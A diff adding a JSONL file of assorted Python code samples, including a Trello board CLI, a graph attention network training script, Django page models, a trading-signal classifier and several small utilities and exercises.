diff --git "a/4391.jsonl" "b/4391.jsonl" new file mode 100644--- /dev/null +++ "b/4391.jsonl" @@ -0,0 +1,642 @@ +{"seq_id":"315188022","text":"# angel_encoder.py\n# Michael Gendron-Renaud\n# Project : ANGEL Discord Bot\n# September 28th 2018\nimport csv\n\nfrom typing import List\n\nDATA_ROOT = \"utils/discord_data/client.angel\"\n\n\ndef read_credentials() -> List[dict]:\n\n dict_list = []\n with open(DATA_ROOT, \"r\") as root:\n reader = csv.DictReader(root)\n for row in reader:\n dict_list.append(row)\n\n return dict_list\n","sub_path":"utils/angel_reader.py","file_name":"angel_reader.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"642826341","text":"import requests\n\ndef read(auth_params, base_url, board_id):\n #Get information about board's column\n column_data = requests.get(base_url.format('boards') + '/' + board_id + '/lists', params = auth_params).json()\n\n #Go along massive\n for column in column_data:\n #Get information about each task in column\n task_data = requests.get(base_url.format('lists') + '/' + column['id'] + '/cards', params = auth_params).json()\n print(column['name'],' ', len(task_data))\n if not task_data:\n print('\\t' + 'No tasks!')\n continue\n for task in task_data:\n print('\\t' + task['name'])\n\n return 1\n\n\ndef create_task(name, column_name,auth_params, base_url, board_id):\n #Get information about board's column\n column_data = requests.get(base_url.format('boards') + '/' + board_id + '/lists', params = auth_params).json()\n\n #Find correct field in column\n for column in column_data:\n if column['name'] == column_name:\n #POST your param and add your task\n requests.post(base_url.format('cards'), data={'name': name, 'idList':column['id'], **auth_params})\n break\n return 1\n\ndef create_column(name,auth_params, base_url, board_id):\n #POST information and add column to board\n requests.post(base_url.format('boards') + \"/\" + board_id + \"/lists\", data={'name': name, **auth_params})\n\n return 1\n\n\n\ndef move(name, column_name,auth_params, base_url, board_id):\n #Get information about board's column\n column_data = requests.get(base_url.format('boards') + '/' + board_id + '/lists', params=auth_params).json()\n\n #Create list where programm put equal name of tasks\n tasks=[]\n info = \"Found >1 tasks! Please choose what's you mean\\n\"\n\n count = 0\n for column in column_data:\n column_task = requests.get(base_url.format('lists') + '/' + column['id'] + '/cards', params=auth_params).json()\n for task in column_task:\n\n # add equal tasks\n if task['name'] == name:\n count += 1\n info += str(count) + \". 
\" + str(task['id']) + \" - task_id in \" + column['name'] + \"\\n\"\n tasks.append(task['id'])\n\n #simple handler\n if(len(tasks) == 0):\n print('\\t'+'task not found')\n return 1\n elif len(tasks) == 1:\n task_id = tasks[0]\n else:\n #If programm find more than 1 equal task's name then it ask you to choose correct task\n print(info)\n task_id = tasks[int(input()) - 1]\n\n\n\n #change task location\n for column in column_data:\n if column['name']==column_name:\n #\n requests.put(base_url.format('cards') + '/' + task_id +\n '/idList', data={'value':column['id'],\n **auth_params})\n break\n\n return 1\n\ndef main():\n #ask base information for work\n base_url = \"https://api.trello.com/1/{}\"\n key = input(\"Enter your trello key\")\n token = input(\"Enter your trello token\")\n board_id = input(\"Enter board id\")\n auth_params = {\n 'key':key,\n 'token':token\n }\n decide = 1\n while decide:\n print(\"What do you want?\")\n print(\"Enter 1 to show board\")\n print(\"Enter 2 to create new task in column\")\n print(\"Enter 3 to create new column\")\n print(\"Enter 4 to move task to another column\")\n print(\"Enter 0 to exit\")\n decide = input()\n if decide == \"1\":\n read(auth_params, base_url, board_id)\n elif decide == \"2\":\n create_task(\n input(\"Enter name of task\"),\n input(\"Enter name of column(Where you add new task)\"),\n auth_params, base_url, board_id\n )\n elif decide == \"3\":\n create_column(\n input(\"Enter name of column\"),\n auth_params, base_url, board_id\n ),\n elif decide == \"4\":\n move(\n input(\"Enter name of task\"),\n input(\"Enter name of column\"),\n auth_params, base_url, board_id\n )\n elif decide == \"0\":\n break\n else:\n print(\"Please, enter 0, 1, 2, 3 or 4\")\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"trello.py","file_name":"trello.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"378798537","text":"import time\nimport numpy as np\nimport tensorflow as tf\nimport sklearn.preprocessing as pp\nfrom pathlib import Path\nimport awesomeml as aml\nimport sys\n\n# ************************************************************\n# global settings\n# ************************************************************\nckpt_file = Path('ckpt/gat/gat_cora.ckpt')\ndata_name = 'cora'\ndata_dir = Path('~/data/cora')\n\nnhop = 1\nif len(sys.argv) > 1:\n nhop = int(sys.argv[1])\nofname_acc = 'acc_gat_nhop_{}.txt'.format(nhop)\nif len(sys.argv) > 2:\n ofname_acc = str(sys.argv[2])\n\n# training params\nnb_epochs = 100000\n#nb_epochs = 2\npatience = 100\nlr = 0.005 # learning rate\nl2_coef = 0.0005 # weight decay\nhid_units = [8] # numbers of hidden units per each attention head in each layer\nn_heads = [8, 1] # additional entry for the output layer\nresidual = False\nnonlinearity = tf.nn.elu\nfea_drop = 0.6\ncoef_drop = 0.6\n\nprint('----- Opt. hyperparams -----')\nprint('lr: ' + str(lr))\nprint('l2_coef: ' + str(l2_coef))\nprint('----- Archi. hyperparams -----')\nprint('nb. layers: ' + str(len(hid_units)))\nprint('nb. units per layer: ' + str(hid_units))\nprint('nb. 
attention heads: ' + str(n_heads))\nprint('residual: ' + str(residual))\nprint('nonlinearity: ' + str(nonlinearity))\n\n\n# ************************************************************\n# prepare data\n# ************************************************************\ndata = aml.dataset.load_citation(data_dir, 'cora')\ntvt = aml.dataset.load_citation_tvt('cora')\n\nX = data['features']\nX = X / X.sum(axis=1).reshape((-1,1))\nY = pp.label_binarize(data['categories'], classes=list(set(data['categories'])))\nN = X.shape[0]\nP = X.shape[1]\nNC = Y.shape[1]\nassert N == Y.shape[0]\n\nadj = data['citation_graph'].todense()\nadj = adj + adj.T + np.eye(N)\nadj = (adj>0).astype(np.float32)\nbias = np.full_like(adj, -1e9)\nbias[adj>0] = 0\n\nmask_train = np.zeros(N, dtype=np.bool)\nmask_train[data['id_encoder'].transform(tvt['id'][tvt['label']=='train'])]=1\nmask_val = np.zeros(N, dtype=np.bool)\nmask_val[data['id_encoder'].transform(tvt['id'][tvt['label']=='validation'])]=1\nmask_test = np.zeros(N, dtype=np.bool)\nmask_test[data['id_encoder'].transform(tvt['id'][tvt['label']=='test'])]=1\n\nnb_nodes = N\nft_size = P\nnb_classes = NC\n\n# ************************************************************\n# construct computing graph\n# ************************************************************\nX = X[np.newaxis]\nY = Y[np.newaxis]\nbias = bias[np.newaxis]\nmask_train = mask_train[np.newaxis]\nmask_val = mask_val[np.newaxis]\nmask_test = mask_test[np.newaxis]\n\ntf.reset_default_graph()\nwith tf.name_scope('input'):\n ftr_in = tf.placeholder(dtype=tf.float32, shape=(1,N,P))\n bias_in = tf.placeholder(dtype=tf.float32, shape=(1,N,N))\n lbl_in = tf.placeholder(dtype=tf.int32, shape=(1,N,NC))\n msk_in = tf.placeholder(dtype=tf.int32, shape=(1,N))\n training = tf.placeholder(dtype=tf.bool, shape=())\n\nattns = []\nfor _ in range(n_heads[0]):\n attns.append(aml.layers.gat(\n ftr_in, bias_mat=bias_in, out_sz=hid_units[0],\n activation=nonlinearity, in_drop=fea_drop, coef_drop=coef_drop,\n residual=False, training=training))\n h_1 = tf.concat(attns, axis=-1)\n\nfor i in range(1, len(hid_units)):\n h_old = h_1\n attns = []\n for _ in range(n_heads[i]):\n attns.append(aml.layers.gat(\n h_1, bias_mat=bias_in, out_sz=hid_units[i],\n activation=nonlinearity, in_drop=fea_drop,\n coef_drop=coef_drop, residual=residual, training=training))\n h_1 = tf.concat(attns, axis=-1)\nout = []\nfor i in range(n_heads[-1]):\n out.append(aml.layers.gat(\n h_1, bias_mat=bias_in, out_sz=NC, activation=lambda x: x,\n in_drop=fea_drop, coef_drop=coef_drop, residual=False, training=training))\nlogits = tf.add_n(out) / n_heads[-1]\n\nlog_resh = tf.reshape(logits, [-1, NC])\nlab_resh = tf.reshape(lbl_in, [-1, NC])\nmsk_resh = tf.reshape(msk_in, [-1])\nmsk_resh = tf.cast(msk_resh, dtype=tf.float32)\nmsk_resh /= tf.reduce_mean(msk_resh)\nif hasattr(tf.nn, 'softmax_cross_entropy_with_logits_v2'):\n loss = tf.nn.softmax_cross_entropy_with_logits_v2(logits=log_resh, labels=lab_resh)\nelse:\n loss = tf.nn.softmax_cross_entropy_with_logits(logits=log_resh, labels=lab_resh)\nloss *= msk_resh\nloss = tf.reduce_mean(loss)\n\ntmp = tf.equal(tf.argmax(log_resh,1), tf.argmax(lab_resh,1))\ntmp = tf.cast(tmp, tf.float32)\ntmp *= msk_resh\naccuracy = tf.reduce_mean(tmp)\n\nvars = tf.trainable_variables()\nlossL2 = tf.add_n([tf.nn.l2_loss(v) for v in vars if v.name not in\n ['bias', 'gamma', 'b', 'g', 'beta']]) *l2_coef\nopt = tf.train.AdamOptimizer(learning_rate=lr)\ntrain_op = opt.minimize(loss+lossL2)\n\ninit_op = 
tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n\n# ************************************************************\n# training\n# ************************************************************\nvlss_mn = np.inf\nvacc_mx = 0.0\ncurr_step = 0\n\nsaver = tf.train.Saver()\nckpt_file.parent.mkdir(parents=True, exist_ok=True)\nwith tf.Session() as sess:\n sess.run(init_op)\n\n for epoch in range(nb_epochs):\n _, loss_tr, acc_tr = sess.run(\n [train_op, loss, accuracy],\n feed_dict={\n ftr_in: X,\n bias_in: bias,\n lbl_in: Y,\n msk_in: mask_train,\n training: True})\n\n loss_vl, acc_vl = sess.run(\n [loss, accuracy],\n feed_dict={\n ftr_in: X,\n bias_in: bias,\n lbl_in: Y,\n msk_in: mask_val,\n training: False})\n print('Training: loss = %.5f, acc = %.5f | Val: loss = %.5f, acc = %.5f' % (loss_tr, acc_tr, loss_vl, acc_vl))\n\n if acc_vl >= vacc_mx or loss_vl <= vlss_mn:\n if acc_vl >= vacc_mx and loss_vl <= vlss_mn:\n vacc_early_model = acc_vl\n vlss_early_model = loss_vl\n saver.save(sess, str(ckpt_file))\n vacc_mx = np.max((acc_vl, vacc_mx))\n vlss_mn = np.min((loss_vl, vlss_mn))\n curr_step = 0\n else:\n curr_step += 1\n if curr_step == patience:\n print('Early stop! Min loss: ', vlss_mn, ', Max accuracy: ', vacc_mx)\n print('Early stop model validation loss: ', vlss_early_model, ', accuracy: ', vacc_early_model)\n break\n\n saver.restore(sess, str(ckpt_file))\n\n loss_ts, acc_ts = sess.run(\n [loss, accuracy],\n feed_dict={\n ftr_in: X,\n bias_in: bias,\n lbl_in: Y,\n msk_in: mask_test,\n training: False})\n\n with open(ofname_acc, 'a') as file:\n file.write('{} '.format(acc_ts))\n \n print('Test loss:', loss_ts, '; Test accuracy:', acc_ts)\n sess.close()\n","sub_path":"Final Project/Graph Attension - Liyu & Jiaying/code/gat.py","file_name":"gat.py","file_ext":"py","file_size_in_byte":6812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"627470701","text":"import numpy as np\nimport pandas as pd\nimport csv\nfrom pandas.core.frame import DataFrame\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\ntmp_lst = []\nwith open('data_v4.4.csv', 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n tmp_lst.append(row)\ndf = pd.DataFrame(tmp_lst[1:], columns=tmp_lst[0])\ndata = df[\"diff\"].tolist()\nnumbers = list(map(int, data))\n\nfor num_bins in range(2,31): #we require bin from 2 to 30\n n, bins, patches = plt.hist(numbers, num_bins, density=1, facecolor='blue', alpha=0.5)\n plt.xlabel('diff') \n plt.ylabel('Probability')\n plt.title(r'Histogram')\n plt.subplots_adjust(left=0.15)\n plt.savefig(\"%d.png\"%(num_bins))\n plt.cla()\n","sub_path":"320180939790-HuYue/homework_bin/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"368501256","text":"from setuptools import setup\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(\n name='Fortnite-API-com',\n packages=['FortniteAPI'],\n version='0.0.5',\n license='MIT',\n description='Simple python wrapper for https://fortniteapi.com/',\n author='KarkaLT',\n author_email='karoliscd@gmail.com',\n url='https://fortniteapi.com/',\n keywords=['fortnite', 'stats', 'statistics', 'game'],\n install_requires=['requests==2.21.0'],\n long_description=long_description,\n 
long_description_content_type='text/markdown'\n)\n","sub_path":"pypi_install_script/Fortnite-API-com-0.0.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"348608498","text":"from sklearn.neural_network import MLPClassifier\nimport numpy as np\n\nfrom random import randint\n\nfrom MovingAverageCrossing import MovingAverageCrossing\nfrom TrendChecker import TrendChecker\nfrom FeatureSelection import FeatureSelection\n\nclass IntelligentMovingAverageCrossing:\n\n def __init__(\n self,\n featureSelection=False,\n nFeatures=3,\n nOutputs=1,\n architecture=(15,15),\n initialData=[],\n trainingData=[]\n ):\n\n self.neuralNetwork = MLPClassifier(\n activation='logistic',\n solver='lbfgs',\n alpha=1e-4,\n hidden_layer_sizes=architecture,\n random_state=1\n )\n\n if featureSelection:\n fs = FeatureSelection()\n self.features = fs.generateFeatures(nFeatures, initialData, trainingData)\n else:\n if nFeatures > 9:\n raise(ValueError(\"MaxFeature == 9 when featureSelection == False\"))\n mac1 = MovingAverageCrossing(5, 20)\n mac2 = MovingAverageCrossing(10, 20)\n mac3 = MovingAverageCrossing(5, 10)\n mac4 = MovingAverageCrossing(7, 20)\n mac5 = MovingAverageCrossing(14, 20)\n mac6 = MovingAverageCrossing(7, 10)\n mac7 = MovingAverageCrossing(7, 30)\n mac8 = MovingAverageCrossing(14, 30)\n mac9 = MovingAverageCrossing(7, 40)\n features = [mac1, mac2, mac3, mac4, mac5, mac6, mac7, mac8, mac9]\n self.features = features[:nFeatures]\n\n self.trend = False\n self.lastValue = (False, True)\n\n self.nOutputs = nOutputs\n self.trendChecker = TrendChecker()\n\n def setup(self, initialData, trainingData):\n # Setup\n longPeriods = []\n\n for f in self.features:\n longPeriods.append(f.longPeriod)\n longestPeriod = max(longPeriods)\n\n if len(initialData) < longestPeriod:\n raise(ValueError(\"Not enough initialization data.\"))\n\n for f in self.features:\n f.setup(initialData)\n\n # train prediction\n X = []\n for data in trainingData:\n x_i = []\n for f in self.features:\n x_i.append(f.onData(data)[0])\n X.append(x_i)\n X = np.array(X[1:])\n\n if self.nOutputs == 2:\n y = []\n y.append(self.trendChecker.identifyAllTrends(np.array(trainingData)))\n y.append(self.trendChecker.identifyAllReversions(np.array(trainingData)))\n y = np.matrix(y)\n y = y.getT()\n else:\n y = self.trendChecker.identifyAllTrends(np.array(trainingData))\n self.neuralNetwork.fit(X, y)\n\n def onData(self, data):\n featuresData = []\n for f in self.features:\n featuresData.append(f.onData(data)[0])\n featuresData = np.array(featuresData)\n featuresData = featuresData.reshape(1, -1)\n\n if self.nOutputs == 2:\n self.lastValue = self.neuralNetwork.predict(featuresData)\n self.lastValue = (self.lastValue[0][0], self.lastValue[0][1])\n else:\n trend = self.neuralNetwork.predict(featuresData)\n reversal = trend != self.trend\n self.trend = trend\n self.lastValue = (trend, reversal)\n\n return self.lastValue\n","sub_path":"generalized_code/IntelligentMovingAverageCrossing.py","file_name":"IntelligentMovingAverageCrossing.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"329925260","text":"#!/bin/python\nfrom bitz.factory import Factory\nimport argparse\n\ntry:\n import ConfigParser\nexcept ImportError:\n import configparser as ConfigParser\n\ndef get_args():\n \"\"\"\n Get input arguments\n \"\"\"\n parser = 
argparse.ArgumentParser(description='Account balance archive.')\n parser.add_argument('-config', action='store', dest='config',\n help='Configuration file path',\n default='')\n return parser.parse_args()\n\ndef main():\n # Get input arguments\n args = get_args()\n\n # Create factory\n factory = Factory(args.config)\n\n # Logger\n logger = factory.create_logger()\n\n # Starting...\n logger.info('[main]', \"Start to archive account balance...\")\n\n # Initialize objects\n instmt_list = factory.create_instrument_list()\n journal_db = factory.create_journal_database()\n realtime_db = factory.create_realtime_database()\n risk_manager = factory.create_risk_manager(instmt_list)\n market_data_feed = factory.create_market_data_feed(logger, is_basic=True)\n order_server = factory.create_order_server(logger, journal_db, realtime_db, risk_manager, market_data_feed, instmt_list)\n factory.create_exchanges(logger, order_server, market_data_feed)\n\n # Initialize exchange risk\n order_server.initialize_exchange_risk()\n\n # Initialize exchange positions\n order_server.initialize_exchange_positions()\n\n logger.info('[main]', \"Finished to archive account balance.\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"bitz/balance_archive.py","file_name":"balance_archive.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"372021993","text":"\n#ImportModules\nimport ShareYourSystem as SYS\n\n#Define\nMyConditioner=SYS.ConditionerClass(\n\t)['#map@set'](\n\t\t{\n\t\t\t'MyInt':0,\n\t\t\t'MyStr':\"hello\"\t\n\t\t}\n\t)['#map@condition'](\n\t\t[\n\t\t\t(type,SYS.operator.eq,SYS.ConditionerClass),\n\t\t\t('MyInt',SYS.operator.eq,0),\n\t\t\t('MyStr',SYS.operator.eq,\"#direct:hello\")\n\t\t]\n\t)\n\n#print\nprint('MyConditioner.ItemizedMapValueVariablesList is ')\nprint(MyConditioner.ItemizedMapValueVariablesList)","sub_path":"Pythonlogy/ShareYourSystem/Standards/Itemizers/Conditioner/05_ExampleDoc.py","file_name":"05_ExampleDoc.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"458628708","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom lstudio.common.models import BaseCommonModel, ContentPlaceholder\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom django.utils.translation import ugettext as _\nfrom filebrowser.fields import FileBrowseField\nfrom lstudio.media.models import ImageGallery\nfrom django.template.loader import render_to_string\nfrom adminsortable.models import Sortable\nfrom django.template import Template, Context\nfrom django.utils.safestring import mark_safe\nimport re\nfrom lstudio.menus.models import Menu\nimport math\nfrom HTMLParser import HTMLParser\nfrom django.db.models.signals import pre_save, post_save\nfrom django.core.urlresolvers import reverse\nfrom lstudio.common.models import reset_cache_handler, TEMPLATES_CHOICES\n\n\nclass InfoPage(BaseCommonModel, Sortable):\n published = models.BooleanField(verbose_name=_(\"Published\"), default=True)\n\n title = models.CharField(verbose_name=_(\"Title\"), max_length=255)\n\n text = models.TextField(verbose_name=_(\"HTML\"))\n\n image = FileBrowseField(verbose_name=_(\"Image\"), max_length=300, directory=\"images/\",\n extensions=[\".jpg\", \".png\", \".jpeg\"], blank=True, null=True)\n\n # image = models.ImageField(upload_to='images', blank=True, null=True)\n\n SHOW_OPTIONS_CHOICES = (\n # ('', _(\"Do not show\")),\n 
('social_buttons', _(\"Social buttons\")),\n ('telephones', _(\"Telephones\")),\n ('without_additions', _(\"Without additions\")),\n ('date', _(\"Date\")),\n )\n show_in_main = models.CharField(verbose_name=_(\"Main page template\"), max_length=50, choices=SHOW_OPTIONS_CHOICES, null=True, blank=True, default='')\n\n url = models.URLField(verbose_name=_(\"Url\"), null=True, blank=True)\n\n def show_main_page_placeholder(self):\n if self.show_in_main:\n try:\n main_render_obj = ContentPlaceholder.objects.get(slug=u\"info_\"+self.show_in_main)\n return main_render_obj\n except ContentPlaceholder.DoesNotExist:\n pass\n\n return ''\n\n def __unicode__(self):\n return self.title\n\n class Meta(Sortable.Meta):\n verbose_name = _(\"Info page\")\n verbose_name_plural = _(\"Info pages\")\n\n\nclass ProjectPageTag(BaseCommonModel):\n title = models.CharField(verbose_name=_(\"Title\"), max_length=255, null=True, blank=True)\n slug = models.SlugField(verbose_name=_(\"Slug\"), max_length=300)\n\n def __unicode__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"Project tag\")\n verbose_name_plural = _(\"Project tags\")\n\n\nclass PersonPosition(BaseCommonModel, Sortable):\n title = models.CharField(verbose_name=_(\"Title\"), max_length=255, null=True)\n slug = models.SlugField(verbose_name=_(\"Slug\"), null=True, blank=True, max_length=300)\n text = models.TextField(verbose_name=_(\"Text\"), null=True, blank=True)\n POSITION_TYPES_CHOICES = (\n (\"salon\", _(\"Salon\")),\n (\"school\", _(\"School\")),\n )\n type = models.CharField(max_length=50, null=True, blank=True, default='salon', choices=POSITION_TYPES_CHOICES)\n\n def __unicode__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"Person position\")\n verbose_name_plural = _(\"Person positions\")\n\n\nclass BasePage(MPTTModel, BaseCommonModel, Sortable):\n parent = TreeForeignKey('self', verbose_name=_(\"Parent\"), null=True, blank=True, related_name='children')\n\n published = models.BooleanField(verbose_name=_(\"Published\"), default=True)\n\n title = models.CharField(verbose_name=_(\"Title\"), max_length=255)\n slug = models.SlugField(verbose_name=_(\"Slug\"), max_length=300)\n\n text = models.TextField(verbose_name=_(\"HTML\"))\n\n has_video = models.BooleanField(verbose_name=_(\"Has video\"), default=False)\n has_gallery = models.BooleanField(verbose_name=_(\"Has gallery\"), default=False)\n\n short_text = models.TextField(verbose_name=_(\"Short text\"), null=True, blank=True)\n\n def get_safe_title(self):\n return mark_safe(self.title)\n\n def get_safe_short_text(self):\n return mark_safe(self.short_text)\n\n def render_text(self):\n text_tpl = Template(self.text)\n content_msgs = {}\n galleries = {}\n menus = {}\n for msg in self.content_messages.all():\n content_msgs[msg.slug] = mark_safe(msg.text)\n for gallery in self.galleries.all():\n galleries[gallery.slug] = gallery.render()\n for menu in self.menus.all():\n menus[menu.slug] = menu.render()\n text_tpl_cntxt = Context({'content_messages': content_msgs,\n 'galleries': galleries,\n 'menus': menus})\n rendered_text_tpl = text_tpl.render(text_tpl_cntxt)\n\n return mark_safe(rendered_text_tpl)\n\n def render_short_text(self):\n text_tpl = Template(self.short_text)\n content_msgs = {}\n galleries = {}\n menus = {}\n for msg in self.content_messages.all():\n content_msgs[msg.slug] = mark_safe(msg.text)\n for gallery in self.galleries.all():\n galleries[gallery.slug] = gallery.render()\n for menu in self.menus.all():\n menus[menu.slug] = menu.render()\n 
text_tpl_cntxt = Context({'content_messages': content_msgs,\n 'galleries': galleries,\n 'menus': menus})\n rendered_text_tpl = text_tpl.render(text_tpl_cntxt)\n\n return mark_safe(rendered_text_tpl)\n\n meta_title = models.TextField(verbose_name=_(\"Meta title\"), null=True, blank=True)\n meta_description = models.TextField(verbose_name=_(\"Meta description\"), null=True, blank=True)\n\n image = FileBrowseField(verbose_name=_(\"Image\"), max_length=300, directory=\"images/\",\n extensions=[\".jpg\", \".png\", \".jpeg\"], blank=True, null=True)\n sausage_gallery = models.ForeignKey(ImageGallery, verbose_name=_(\"Sausage gallery\"), null=True, blank=True,\n related_name='sausage_pages')\n galleries = models.ManyToManyField(ImageGallery, verbose_name=_(\"Galleries\"), null=True, blank=True)\n menus = models.ManyToManyField(Menu, verbose_name=_(\"Menus\"), null=True, blank=True)\n content_messages = models.ManyToManyField(ContentPlaceholder, verbose_name=_(\"Content placeholders\"), null=True,\n blank=True)\n template = models.CharField(verbose_name=_(\"Template\"), max_length=255, choices=TEMPLATES_CHOICES,\n default='page.html')\n full_url = models.SlugField(verbose_name=_(\"Absolute url\"), blank=True)\n\n def get_absolute_url(self):\n ancestors = []\n for ancestor in self.get_ancestors(include_self=True):\n ancestors.append(ancestor.slug)\n\n full_url = u\"/\" + u\"/\".join(ancestors) + u\"/\"\n\n return full_url\n\n def __unicode__(self):\n return u\"{} ({})\".format(self.title, self.template)\n\n def save(self, *args, **kwargs):\n while self.__class__.objects.filter(slug=self.slug).exclude(pk=self.pk).count():\n match_url_obj = re.match(r'^(.+)-(\\d+)$', self.slug)\n\n if match_url_obj:\n next_int = int(match_url_obj.group(2)) + 1\n self.slug = match_url_obj.group(1) + u\"-\" + str(next_int)\n else:\n self.slug += u'-2'\n\n super(BasePage, self).save(*args, **kwargs)\n\n def get_breadcrumbs(self):\n ans = [{'url': reverse('index'), 'title': _(\"Main page\")}]\n ans += [{'url': x.get_absolute_url(), 'title': x.title}\n for x in reversed(self.get_ancestors(include_self=False, ascending=True))]\n ans += [{'url': None, 'title': self.title}]\n return ans\n\n # project page fields and methods\n project_tags = models.ManyToManyField(ProjectPageTag, null=True, blank=True)\n DOING_TEMPLATE_CHOICES = (\n ('projects/regular.html', _(\"Regular\")),\n ('projects/wide.html', _(\"Wide\")),\n ('projects/slider.html', _(\"Slider\")),\n )\n preview_template = models.CharField(verbose_name=_(\"Preview template\"), max_length=50,\n choices=DOING_TEMPLATE_CHOICES,\n default='doings/regular.html',\n null=True, blank=True)\n project_slider_gallery = models.ForeignKey(ImageGallery, null=True, blank=True, related_name='projects')\n\n def render_preview(self):\n return render_to_string(self.preview_template, {'object': self})\n\n @classmethod\n def get_tags(cls):\n return ProjectPageTag.objects.all().distinct('title')\n\n # staff page fields and methods\n first_name = models.CharField(verbose_name=_(\"First name\"), max_length=255, null=True, blank=True)\n last_name = models.CharField(verbose_name=_(\"Last name\"), max_length=255, null=True, blank=True)\n position = models.ForeignKey(PersonPosition, verbose_name=_(\"Position\"),\n null=True, blank=True, related_name='people')\n\n def get_stars(self):\n max_stars = 5\n pos_stars = self.personrating_set.filter(positive=True).count()\n neg_stars = self.personrating_set.filter(positive=False).count()\n\n all_stars = pos_stars + neg_stars\n if all_stars < 1:\n return 
xrange(max_stars)\n\n avg = float(pos_stars) / all_stars * 100.0\n\n return xrange(int(math.ceil(avg/(100/max_stars))))\n\n def get_full_name(self):\n return u\"{} {}\".format(self.first_name, self.last_name)\n\n # service page fields and methods\n price = models.CharField(verbose_name=_(\"Price\"), max_length=255, null=True, blank=True)\n\n class Meta(object):\n verbose_name = _(\"Page\")\n verbose_name_plural = _(\"Pages\")\n\n\nclass PersonRating(BaseCommonModel):\n positive = models.BooleanField(verbose_name=_(\"Positive\"), default=True)\n ip = models.IPAddressField(verbose_name=_(\"Ip address\"), null=True, blank=True)\n person = models.ForeignKey(BasePage, verbose_name=_(\"Person\"), null=True, blank=True)\n\n name = models.CharField(verbose_name=_(\"Name\"), max_length=255, null=True, blank=True)\n email = models.EmailField(verbose_name=_(\"Email\"), max_length=255, null=True, blank=True)\n text = models.TextField(verbose_name=_(\"Text\"), null=True, blank=True)\n\n class Meta:\n verbose_name = _(\"Person rating\")\n verbose_name_plural = _(\"People ratings\")\n\n\nclass MediaHTMLParser(HTMLParser):\n instance = None\n\n def __init__(self, instance=None):\n HTMLParser.__init__(self)\n self.instance = instance\n\n def save_instance(self, media_type='video'):\n if self.instance:\n if media_type == 'video':\n self.instance.has_video = True\n elif media_type == 'gallery':\n self.instance.has_gallery = True\n\n def handle_starttag(self, tag, attrs):\n if tag == 'video' or tag == 'flash' or tag == 'quicktime' or tag == 'iframe' or tag == 'shockwave':\n self.save_instance(media_type='video')\n\n def handle_endtag(self, tag):\n pass\n\n def handle_data(self, data):\n pass\n\n\ndef define_page_media(**kwargs):\n instance = kwargs.get('instance')\n parse = MediaHTMLParser(instance=instance)\n parse.feed(instance.text)\n\npre_save.connect(define_page_media, sender=BasePage)\n\napp_label = _(\"Pages\")\n\n\npost_save.connect(reset_cache_handler, sender=InfoPage)\npost_save.connect(reset_cache_handler, sender=ProjectPageTag)\npost_save.connect(reset_cache_handler, sender=PersonPosition)\npost_save.connect(reset_cache_handler, sender=BasePage)\npost_save.connect(reset_cache_handler, sender=PersonRating)","sub_path":"lstudio/pages/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"312711257","text":"a=input(\"Primeiro valor:\")\nb=input(\"Segundo valor:\")\n#condiçao e ainda tem o elif=elseif\nif a>b :\n print (\"o primeiro numero é o maior\")\nif b>a:\n print (\"o segundo numero é o maior\")\n\nidade=input(\"Digite idade:\")\n\nif idade<=3 :\n print (\"Carro e novo\")\nelse:\n print (\" carro velho\")\nvel=input(\"Digite velocidade km/h:\")\nif vel>110 :\n multa=(vel-110)*5\n print(\"valor da multa e %5.2f\" %multa)\nelse:\n print(\"Multa nenhuma\")\n\n#repetiçao\nx=1\nwhile x<=3:\n print (x)\n x=x+1\n#numeros pares\nfim=input(\"digite o numero:\")\nx=1\nwhile x<=fim:\n if x%2==0 :\n print(\"%d e um numero par\" %x)\n x=x+1\n\ni=1\nfat=1\nn=input(\"Digite n:\")\nwhile i<=n:\n fat=fat*i\n i=i+1\nprint(\"Fat(%d) = %d\" %(n,fat))\n\n \n","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"48485161","text":"import json\nimport datetime\nfrom collections import deque\nfrom itertools import count\nfrom azure.storage.file import 
